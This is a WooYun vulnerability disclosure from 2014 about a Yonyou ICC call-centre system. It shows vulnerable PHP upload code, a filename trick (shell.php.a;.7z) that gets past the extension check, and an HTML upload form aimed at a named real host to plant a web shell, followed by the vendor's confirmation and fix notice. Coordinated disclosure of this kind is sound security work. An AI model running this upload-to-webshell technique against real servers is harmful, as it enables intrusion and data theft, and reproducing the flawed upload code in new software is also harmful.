当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060435

漏洞标题:用友某系统Getshell+用户敏感信息泄露

相关厂商:用友软件

漏洞作者: secmap

提交时间:2014-05-14 18:57

修复时间:2014-08-12 18:58

公开时间:2014-08-12 18:58

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-14: 细节已通知厂商并且等待厂商处理中
2014-05-15: 厂商已经确认,细节仅向厂商公开
2014-05-18: 细节向第三方安全合作伙伴开放
2014-07-09: 细节向核心白帽子及相关领域专家公开
2014-07-19: 细节向普通白帽子公开
2014-07-29: 细节向实习白帽子公开
2014-08-12: 细节向公众公开

简要描述:

用友某系统多处Getshell+用户敏感信息泄露

详细说明:

#1 漏洞代码
/5107/upload/upload.php
/5107/upload/screenImagesSave.php

$date = date("Ymd");
$dest = $CONFIG->basePath.'data/files/'.$date."/";
$COMMON->createDir($dest);
$filename = paramsFmt(urldecode($_GET["filename"]));
$nameExt = strtolower($COMMON->getFileExtName($_FILES['file']['name']));
$filenameExt = strtolower($COMMON->getFileExtName($filename));
$allowedType = array('jpg', 'gif', 'bmp', 'png', 'jpeg','txt','zip','tgz','7z','doc','docx','log','xls','xlsx','ppt','pptx','rtf','pdf','rar');
	
if(!in_array($nameExt, $allowedType) || !in_array($filenameExt,$allowedType)){
	if($ft == '1'){
		echo 'pe';
	}else if($ft == '2'){
		echo 'fe';
	}	
	exit;
}
$filenameNew = $dest.$filename;
if(empty($_FILES["file"]['error'])){
	move_uploaded_file($_FILES["file"]["tmp_name"],$filenameNew);
}
if(file_exists($filenameNew)){
	echo(urlencode($CONFIG->baseUrl.'data/files/'.$date."/".$filename));
//	@chmod($filenameNew, 0444);
}else{
	if($ft == '1'){
		echo 'pe';
	}else if($ft == '2'){
		echo 'fe';
	}
}


其中 move_uploaded_file($_FILES["file"]["tmp_name"],$filenameNew);
$filename参数是用户GET提交的,我们可以控制,虽然有文件类型的验证,但我们任然可以利用。
方法:利用解析漏洞即可(不同的中间件,文件格式有所变化),如:shell.php.a;.7z
#2 利用方法
保持如下代码为htm

<html>
<form action="http://icc.hnair.com/5107/upload/screenImagesSave.php?filename=1.php.a;.7z" name="test" method="post" enctype="multipart/form-data">
  <input type="file" name="file" >
  <input type="submit" value="upload">
</form>
</html>


上传文件jpg格式的网马文件,上传 即可在/data/files/日期/下生成1.php.a;.7z
#3 连接木马文件
http://icc.hnair.com/data/files/20140416/1.php.a%3B.7z

22.jpg


漏洞证明:

#4 用户敏感信息泄露

screen1D151123820.jpg


screen1D49144055.jpg

修复方案:

#5 成功getshell

22.jpg

版权声明:转载请注明来源 secmap@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-05-15 09:10

厂商回复:

感谢 secmap@乌云 为我们提供的安全问题,此问题系旧版本ICC(4.0及之前版本)系统存在的问题,后经发现,我们已经提供了升级方案和升级包并通知用户,以解决此问题,我们将再次督促用户尽快升级系统。2010年5月以后,我们已经重新设计并迁移到J2EE上实现了web访问前端等重要功能模块(4.1以后版本),对系统安全相关特性做了增强,我们将努力为客户提供安全可靠的互联网呼叫中心软件产品。

最新状态:

暂无